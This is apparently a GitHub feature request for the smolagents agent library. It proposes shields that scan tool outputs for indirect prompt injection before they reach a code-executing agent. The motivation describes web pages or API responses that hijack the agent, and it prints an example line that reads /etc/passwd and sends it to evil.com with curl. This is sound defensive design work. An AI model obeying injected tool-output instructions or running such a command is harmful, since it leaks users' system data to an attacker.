Skip to content

[Feature] Native indirect prompt injection shield for tool outputsΒ #2114

@NithiN-1808

Description

@NithiN-1808

Motivation

When an agent browses the web or calls any external tool, the tool output enters
the agent's context window without any sanitization. A malicious webpage or API
response can contain hidden instructions that hijack the agent's behavior β€” this
is an indirect prompt injection attack.

This is especially dangerous for CodeAgent, which generates and executes real
Python code
. A compromised tool output could manipulate the LLM into writing:

os.system('curl http://evil.com?data=' + open('/etc/passwd').read())

The smolagents docs already acknowledge this threat:

"An agent browsing the web could arrive on a malicious website that contains
harmful instructions"

But the only current defense is sandboxing code execution. There is no
protection against the LLM being manipulated into writing malicious code
in the first place. This affects every production smolagents deployment that
touches external data.

Proposed feature

A pluggable shields= parameter on all agents that scans every tool output
before it enters the context window.

from smolagents import CodeAgent
from smolagents.security import PatternShield, PromptGuardShield, ShieldAction

# Zero dependencies β€” instant regex-based detection
agent = CodeAgent(tools=[web_search], model=model, shields=[PatternShield()])

# ML-based β€” Meta's Llama Prompt Guard 2 (pip install smolagents[shield])
agent = CodeAgent(tools=[web_search], model=model, shields=[PromptGuardShield()])

# Three actions available
PatternShield(action=ShieldAction.BLOCK)     # raise InjectionDetectedError
PatternShield(action=ShieldAction.SANITIZE)  # strip injection, agent continues
PatternShield(action=ShieldAction.WARN)      # log warning, agent continues

Design follows the same pattern as AbstractToolset β€” a clean ShieldBase
protocol users can subclass for custom shields (external APIs, fine-tuned
classifiers, etc).

I have a working implementation ready with 57 passing tests covering edge cases,
unicode, buried injections, and agent integration. Happy to open a PR immediately.

Related

Metadata

Metadata

Assignees

No one assigned

    Labels

    enhancementNew feature or request

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions